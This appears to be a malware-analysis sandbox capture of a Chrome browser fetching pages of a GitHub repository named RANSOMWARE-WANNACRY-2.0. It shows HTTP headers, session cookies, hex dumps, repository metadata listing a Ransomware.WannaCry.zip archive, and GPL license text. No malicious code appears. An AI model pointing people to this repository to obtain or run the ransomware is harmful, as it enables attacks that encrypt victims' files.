                                                                                      2024-03-23 14:47:28 UTC662INData Raw: 7b 22 6f 69 64 22 3a 22 32 34 34 35 61 62 64 34 35 63 39 39 63 33 61 64 39 36 31 31 65 62 63 61 63 63 36 63 66 65 32 38 34 35 31 63 32 63 30 64 22 2c 22 75 72 6c 22 3a 22 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 63 6f 6d 6d 69 74 2f 32 34 34 35 61 62 64 34 35 63 39 39 63 33 61 64 39 36 31 31 65 62 63 61 63 63 36 63 66 65 32 38 34 35 31 63 32 63 30 64 22 2c 22 64 61 74 65 22 3a 22 32 30 31 37 2d 30 36 2d 30 31 54 31 35 3a 31 37 3a 33 38 2e 30 30 30 2d 30 33 3a 30 30 22 2c 22 73 68 6f 72 74 4d 65 73 73 61 67 65 48 74 6d 6c 4c 69 6e 6b 22 3a 22 3c 61 20 64 61 74 61 2d 70 6a 61 78 3d 5c 22 74 72 75 65 5c 22 20 63 6c 61 73 73 3d 5c 22 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 5c 22 20 68
                                                                                      Data Ascii: {"oid":"2445abd45c99c3ad9611ebcacc6cfe28451c2c0d","url":"/chronosmiki/RANSOMWARE-WANNACRY-2.0/commit/2445abd45c99c3ad9611ebcacc6cfe28451c2c0d","date":"2017-06-01T15:17:38.000-03:00","shortMessageHtmlLink":"<a data-pjax=\"true\" class=\"Link--secondary\" h
                                                                                      2024-03-23 14:47:28 UTC232INData Raw: 76 3d 34 22 2c 22 70 61 74 68 22 3a 22 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 22 7d 5d 2c 22 63 6f 6d 6d 69 74 74 65 72 41 74 74 72 69 62 75 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 63 6f 6d 6d 69 74 74 65 72 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 77 65 62 2d 66 6c 6f 77 22 2c 22 64 69 73 70 6c 61 79 4e 61 6d 65 22 3a 22 47 69 74 48 75 62 22 2c 22 61 76 61 74 61 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 75 2f 31 39 38 36 34 34 34 37 3f 76 3d 34 22 2c 22 70 61 74 68 22 3a 22 2f 77 65 62 2d 66 6c 6f 77 22 7d 2c 22 73 74 61 74 75 73 22 3a 6e 75 6c 6c 2c 22 69 73 53 70 6f 6f 66 65 64 22 3a 66 61 6c 73 65 7d
                                                                                      Data Ascii: v=4","path":"/chronosmiki"}],"committerAttribution":false,"committer":{"login":"web-flow","displayName":"GitHub","avatarUrl":"https://avatars.githubusercontent.com/u/19864447?v=4","path":"/web-flow"},"status":null,"isSpoofed":false}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      131192.168.2.1649845140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC1175OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/tree-commit-info/master HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: application/json
                                                                                      Accept: application/json
                                                                                      X-Requested-With: XMLHttpRequest
                                                                                      GitHub-Verified-Fetch: true
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:28 UTC513INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Content-Type: application/json; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"c1bc9eba2ad10f48476e86ea22dfb4a3"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:28 UTC2936INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:28 UTC661INData Raw: 7b 22 4c 49 43 45 4e 53 45 22 3a 7b 22 6f 69 64 22 3a 22 61 61 32 39 38 34 37 61 30 32 39 34 39 30 62 65 36 39 37 65 33 35 64 37 33 39 30 63 33 38 38 30 32 31 30 31 62 32 37 63 22 2c 22 75 72 6c 22 3a 22 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 63 6f 6d 6d 69 74 2f 61 61 32 39 38 34 37 61 30 32 39 34 39 30 62 65 36 39 37 65 33 35 64 37 33 39 30 63 33 38 38 30 32 31 30 31 62 32 37 63 22 2c 22 64 61 74 65 22 3a 22 32 30 31 37 2d 30 36 2d 30 31 54 31 34 3a 31 39 3a 30 37 2e 30 30 30 2d 30 33 3a 30 30 22 2c 22 73 68 6f 72 74 4d 65 73 73 61 67 65 48 74 6d 6c 4c 69 6e 6b 22 3a 22 3c 61 20 64 61 74 61 2d 70 6a 61 78 3d 5c 22 74 72 75 65 5c 22 20 74 69 74 6c 65 3d 5c 22 49 6e 69 74 69 61 6c 20
                                                                                      Data Ascii: {"LICENSE":{"oid":"aa29847a029490be697e35d7390c38802101b27c","url":"/chronosmiki/RANSOMWARE-WANNACRY-2.0/commit/aa29847a029490be697e35d7390c38802101b27c","date":"2017-06-01T14:19:07.000-03:00","shortMessageHtmlLink":"<a data-pjax=\"true\" title=\"Initial
                                                                                      2024-03-23 14:47:28 UTC586INData Raw: 45 41 44 4d 45 2e 6d 64 5c 22 20 63 6c 61 73 73 3d 5c 22 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 5c 22 20 68 72 65 66 3d 5c 22 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 63 6f 6d 6d 69 74 2f 32 34 34 35 61 62 64 34 35 63 39 39 63 33 61 64 39 36 31 31 65 62 63 61 63 63 36 63 66 65 32 38 34 35 31 63 32 63 30 64 5c 22 3e 55 70 64 61 74 65 20 52 45 41 44 4d 45 2e 6d 64 3c 2f 61 3e 22 7d 2c 22 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 22 3a 7b 22 6f 69 64 22 3a 22 31 39 62 64 38 36 66 38 39 39 38 66 64 30 61 33 34 64 30 35 31 63 61 64 33 38 39 34 63 61 31 39 31 35 35 66 63 64 62 65 22 2c 22 75 72 6c 22 3a 22 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f
                                                                                      Data Ascii: EADME.md\" class=\"Link--secondary\" href=\"/chronosmiki/RANSOMWARE-WANNACRY-2.0/commit/2445abd45c99c3ad9611ebcacc6cfe28451c2c0d\">Update README.md</a>"},"Ransomware.WannaCry.zip":{"oid":"19bd86f8998fd0a34d051cad3894ca19155fcdbe","url":"/chronosmiki/RANSO


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      132192.168.2.1649840140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC1173OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/overview-files/master HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: application/json
                                                                                      Accept: application/json
                                                                                      X-Requested-With: XMLHttpRequest
                                                                                      GitHub-Verified-Fetch: true
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:28 UTC513INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Content-Type: application/json; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"2e94ab749073711241dfd42d24c63208"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:28 UTC2939INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:28 UTC658INData Raw: 7b 22 66 69 6c 65 73 22 3a 5b 7b 22 64 69 73 70 6c 61 79 4e 61 6d 65 22 3a 22 52 45 41 44 4d 45 2e 6d 64 22 2c 22 72 65 70 6f 4e 61 6d 65 22 3a 22 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 22 2c 22 72 65 66 4e 61 6d 65 22 3a 22 6d 61 73 74 65 72 22 2c 22 70 61 74 68 22 3a 22 52 45 41 44 4d 45 2e 6d 64 22 2c 22 70 72 65 66 65 72 72 65 64 46 69 6c 65 54 79 70 65 22 3a 22 72 65 61 64 6d 65 22 2c 22 74 61 62 4e 61 6d 65 22 3a 22 52 45 41 44 4d 45 22 2c 22 72 69 63 68 54 65 78 74 22 3a 22 3c 61 72 74 69 63 6c 65 20 63 6c 61 73 73 3d 5c 22 6d 61 72 6b 64 6f 77 6e 2d 62 6f 64 79 20 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 63 6f 6e 74 61 69 6e 65 72 2d 6c 67 5c 22 20 69 74 65 6d 70 72 6f 70 3d 5c 22 74 65 78 74 5c 22 3e 3c 64 69 76 20
                                                                                      Data Ascii: {"files":[{"displayName":"README.md","repoName":"RANSOMWARE-WANNACRY-2.0","refName":"master","path":"README.md","preferredFileType":"readme","tabName":"README","richText":"<article class=\"markdown-body entry-content container-lg\" itemprop=\"text\"><div
                                                                                      2024-03-23 14:47:28 UTC1370INData Raw: 5c 22 6d 37 2e 37 37 35 20 33 2e 32 37 35 20 31 2e 32 35 2d 31 2e 32 35 61 33 2e 35 20 33 2e 35 20 30 20 31 20 31 20 34 2e 39 35 20 34 2e 39 35 6c 2d 32 2e 35 20 32 2e 35 61 33 2e 35 20 33 2e 35 20 30 20 30 20 31 2d 34 2e 39 35 20 30 20 2e 37 35 31 2e 37 35 31 20 30 20 30 20 31 20 2e 30 31 38 2d 31 2e 30 34 32 2e 37 35 31 2e 37 35 31 20 30 20 30 20 31 20 31 2e 30 34 32 2d 2e 30 31 38 20 31 2e 39 39 38 20 31 2e 39 39 38 20 30 20 30 20 30 20 32 2e 38 33 20 30 6c 32 2e 35 2d 32 2e 35 61 32 2e 30 30 32 20 32 2e 30 30 32 20 30 20 30 20 30 2d 32 2e 38 33 2d 32 2e 38 33 6c 2d 31 2e 32 35 20 31 2e 32 35 61 2e 37 35 31 2e 37 35 31 20 30 20 30 20 31 2d 31 2e 30 34 32 2d 2e 30 31 38 2e 37 35 31 2e 37 35 31 20 30 20 30 20 31 2d 2e 30 31 38 2d 31 2e 30 34 32 5a 6d 2d
                                                                                      Data Ascii: \"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-
                                                                                      2024-03-23 14:47:28 UTC1370INData Raw: 72 67 2f 3c 2f 61 3e 26 67 74 3b 5c 6e 20 45 76 65 72 79 6f 6e 65 20 69 73 20 70 65 72 6d 69 74 74 65 64 20 74 6f 20 63 6f 70 79 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 76 65 72 62 61 74 69 6d 20 63 6f 70 69 65 73 5c 6e 20 6f 66 20 74 68 69 73 20 6c 69 63 65 6e 73 65 20 64 6f 63 75 6d 65 6e 74 2c 20 62 75 74 20 63 68 61 6e 67 69 6e 67 20 69 74 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 2e 5c 6e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 50 72 65 61 6d 62 6c 65 5c 6e 5c 6e 20 20 54 68 65 20 47 4e 55 20 47 65 6e 65 72 61 6c 20 50 75 62 6c 69 63 20 4c 69 63 65 6e 73 65 20 69 73 20 61 20 66 72 65 65 2c 20 63 6f 70 79 6c 65 66 74 20 6c 69 63 65 6e 73 65 20 66 6f 72 5c 6e 73 6f 66 74 77 61 72 65 20 61 6e
                                                                                      Data Ascii: rg/</a>&gt;\n Everyone is permitted to copy and distribute verbatim copies\n of this license document, but changing it is not allowed.\n\n Preamble\n\n The GNU General Public License is a free, copyleft license for\nsoftware an
                                                                                      2024-03-23 14:47:28 UTC1370INData Raw: 63 65 72 74 61 69 6e 20 72 65 73 70 6f 6e 73 69 62 69 6c 69 74 69 65 73 20 69 66 20 79 6f 75 20 64 69 73 74 72 69 62 75 74 65 20 63 6f 70 69 65 73 20 6f 66 20 74 68 65 20 73 6f 66 74 77 61 72 65 2c 20 6f 72 20 69 66 5c 6e 79 6f 75 20 6d 6f 64 69 66 79 20 69 74 3a 20 72 65 73 70 6f 6e 73 69 62 69 6c 69 74 69 65 73 20 74 6f 20 72 65 73 70 65 63 74 20 74 68 65 20 66 72 65 65 64 6f 6d 20 6f 66 20 6f 74 68 65 72 73 2e 5c 6e 5c 6e 20 20 46 6f 72 20 65 78 61 6d 70 6c 65 2c 20 69 66 20 79 6f 75 20 64 69 73 74 72 69 62 75 74 65 20 63 6f 70 69 65 73 20 6f 66 20 73 75 63 68 20 61 20 70 72 6f 67 72 61 6d 2c 20 77 68 65 74 68 65 72 5c 6e 67 72 61 74 69 73 20 6f 72 20 66 6f 72 20 61 20 66 65 65 2c 20 79 6f 75 20 6d 75 73 74 20 70 61 73 73 20 6f 6e 20 74 6f 20 74 68 65
                                                                                      Data Ascii: certain responsibilities if you distribute copies of the software, or if\nyou modify it: responsibilities to respect the freedom of others.\n\n For example, if you distribute copies of such a program, whether\ngratis or for a fee, you must pass on to the
                                                                                      2024-03-23 14:47:28 UTC276INData Raw: 6c 65 2e 20 20 54 68 65 72 65 66 6f 72 65 2c 20 77 65 5c 6e 68 61 76 65 20 64 65 73 69 67 6e 65 64 20 74 68 69 73 20 76 65 72 73 69 6f 6e 20 6f 66 20 74 68 65 20 47 50 4c 20 74 6f 20 70 72 6f 68 69 62 69 74 20 74 68 65 20 70 72 61 63 74 69 63 65 20 66 6f 72 20 74 68 6f 73 65 5c 6e 70 72 6f 64 75 63 74 73 2e 20 20 49 66 20 73 75 63 68 20 70 72 6f 62 6c 65 6d 73 20 61 72 69 73 65 20 73 75 62 73 74 61 6e 74 69 61 6c 6c 79 20 69 6e 20 6f 74 68 65 72 20 64 6f 6d 61 69 6e 73 2c 20 77 65 5c 6e 73 74 61 6e 64 20 72 65 61 64 79 20 74 6f 20 65 78 74 65 6e 64 20 74 68 69 73 20 70 72 6f 76 69 73 69 6f 6e 20 74 6f 20 74 68 6f 73 65 20 64 6f 6d 61 69 6e 73 20 69 6e 20 66 75 74 75 72 65 20 76 65 72 73 69 6f 6e 73 5c 6e 6f 66 20 74 68 65 20 47 50 4c 2c 20 61 73 20 6e 65
                                                                                      Data Ascii: le. Therefore, we\nhave designed this version of the GPL to prohibit the practice for those\nproducts. If such problems arise substantially in other domains, we\nstand ready to extend this provision to those domains in future versions\nof the GPL, as ne
                                                                                      2024-03-23 14:47:28 UTC1370INData Raw: 72 65 65 64 6f 6d 20 6f 66 20 75 73 65 72 73 2e 5c 6e 5c 6e 20 20 46 69 6e 61 6c 6c 79 2c 20 65 76 65 72 79 20 70 72 6f 67 72 61 6d 20 69 73 20 74 68 72 65 61 74 65 6e 65 64 20 63 6f 6e 73 74 61 6e 74 6c 79 20 62 79 20 73 6f 66 74 77 61 72 65 20 70 61 74 65 6e 74 73 2e 5c 6e 53 74 61 74 65 73 20 73 68 6f 75 6c 64 20 6e 6f 74 20 61 6c 6c 6f 77 20 70 61 74 65 6e 74 73 20 74 6f 20 72 65 73 74 72 69 63 74 20 64 65 76 65 6c 6f 70 6d 65 6e 74 20 61 6e 64 20 75 73 65 20 6f 66 5c 6e 73 6f 66 74 77 61 72 65 20 6f 6e 20 67 65 6e 65 72 61 6c 2d 70 75 72 70 6f 73 65 20 63 6f 6d 70 75 74 65 72 73 2c 20 62 75 74 20 69 6e 20 74 68 6f 73 65 20 74 68 61 74 20 64 6f 2c 20 77 65 20 77 69 73 68 20 74 6f 5c 6e 61 76 6f 69 64 20 74 68 65 20 73 70 65 63 69 61 6c 20 64 61 6e 67
                                                                                      Data Ascii: reedom of users.\n\n Finally, every program is threatened constantly by software patents.\nStates should not allow patents to restrict development and use of\nsoftware on general-purpose computers, but in those that do, we wish to\navoid the special dang
                                                                                      2024-03-23 14:47:28 UTC1370INData Raw: 65 5c 22 20 61 20 77 6f 72 6b 20 6d 65 61 6e 73 20 74 6f 20 64 6f 20 61 6e 79 74 68 69 6e 67 20 77 69 74 68 20 69 74 20 74 68 61 74 2c 20 77 69 74 68 6f 75 74 5c 6e 70 65 72 6d 69 73 73 69 6f 6e 2c 20 77 6f 75 6c 64 20 6d 61 6b 65 20 79 6f 75 20 64 69 72 65 63 74 6c 79 20 6f 72 20 73 65 63 6f 6e 64 61 72 69 6c 79 20 6c 69 61 62 6c 65 20 66 6f 72 5c 6e 69 6e 66 72 69 6e 67 65 6d 65 6e 74 20 75 6e 64 65 72 20 61 70 70 6c 69 63 61 62 6c 65 20 63 6f 70 79 72 69 67 68 74 20 6c 61 77 2c 20 65 78 63 65 70 74 20 65 78 65 63 75 74 69 6e 67 20 69 74 20 6f 6e 20 61 5c 6e 63 6f 6d 70 75 74 65 72 20 6f 72 20 6d 6f 64 69 66 79 69 6e 67 20 61 20 70 72 69 76 61 74 65 20 63 6f 70 79 2e 20 20 50 72 6f 70 61 67 61 74 69 6f 6e 20 69 6e 63 6c 75 64 65 73 20 63 6f 70 79 69 6e
                                                                                      Data Ascii: e\" a work means to do anything with it that, without\npermission, would make you directly or secondarily liable for\ninfringement under applicable copyright law, except executing it on a\ncomputer or modifying a private copy. Propagation includes copyin
                                                                                      2024-03-23 14:47:28 UTC1370INData Raw: 69 6e 74 65 72 66 61 63 65 20 74 68 61 74 20 65 69 74 68 65 72 20 69 73 20 61 6e 20 6f 66 66 69 63 69 61 6c 5c 6e 73 74 61 6e 64 61 72 64 20 64 65 66 69 6e 65 64 20 62 79 20 61 20 72 65 63 6f 67 6e 69 7a 65 64 20 73 74 61 6e 64 61 72 64 73 20 62 6f 64 79 2c 20 6f 72 2c 20 69 6e 20 74 68 65 20 63 61 73 65 20 6f 66 5c 6e 69 6e 74 65 72 66 61 63 65 73 20 73 70 65 63 69 66 69 65 64 20 66 6f 72 20 61 20 70 61 72 74 69 63 75 6c 61 72 20 70 72 6f 67 72 61 6d 6d 69 6e 67 20 6c 61 6e 67 75 61 67 65 2c 20 6f 6e 65 20 74 68 61 74 5c 6e 69 73 20 77 69 64 65 6c 79 20 75 73 65 64 20 61 6d 6f 6e 67 20 64 65 76 65 6c 6f 70 65 72 73 20 77 6f 72 6b 69 6e 67 20 69 6e 20 74 68 61 74 20 6c 61 6e 67 75 61 67 65 2e 5c 6e 5c 6e 20 20 54 68 65 20 5c 22 53 79 73 74 65 6d 20 4c 69
                                                                                      Data Ascii: interface that either is an official\nstandard defined by a recognized standards body, or, in the case of\ninterfaces specified for a particular programming language, one that\nis widely used among developers working in that language.\n\n The \"System Li
                                                                                      2024-03-23 14:47:28 UTC1370INData Raw: 20 6f 66 20 74 68 65 20 77 6f 72 6b 2e 20 20 46 6f 72 20 65 78 61 6d 70 6c 65 2c 20 43 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 53 6f 75 72 63 65 5c 6e 69 6e 63 6c 75 64 65 73 20 69 6e 74 65 72 66 61 63 65 20 64 65 66 69 6e 69 74 69 6f 6e 20 66 69 6c 65 73 20 61 73 73 6f 63 69 61 74 65 64 20 77 69 74 68 20 73 6f 75 72 63 65 20 66 69 6c 65 73 20 66 6f 72 5c 6e 74 68 65 20 77 6f 72 6b 2c 20 61 6e 64 20 74 68 65 20 73 6f 75 72 63 65 20 63 6f 64 65 20 66 6f 72 20 73 68 61 72 65 64 20 6c 69 62 72 61 72 69 65 73 20 61 6e 64 20 64 79 6e 61 6d 69 63 61 6c 6c 79 5c 6e 6c 69 6e 6b 65 64 20 73 75 62 70 72 6f 67 72 61 6d 73 20 74 68 61 74 20 74 68 65 20 77 6f 72 6b 20 69 73 20 73 70 65 63 69 66 69 63 61 6c 6c 79 20 64 65 73 69 67 6e 65 64 20 74 6f 20 72 65 71 75 69 72
                                                                                      Data Ascii: of the work. For example, Corresponding Source\nincludes interface definition files associated with source files for\nthe work, and the source code for shared libraries and dynamically\nlinked subprograms that the work is specifically designed to requir


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      133192.168.2.1649843140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC1119OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/branch-count HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      X-Requested-With: XMLHttpRequest
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      GitHub-Verified-Fetch: true
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:28 UTC506INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"56a3b41b3adb53ca7fce5703eb10dacf"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
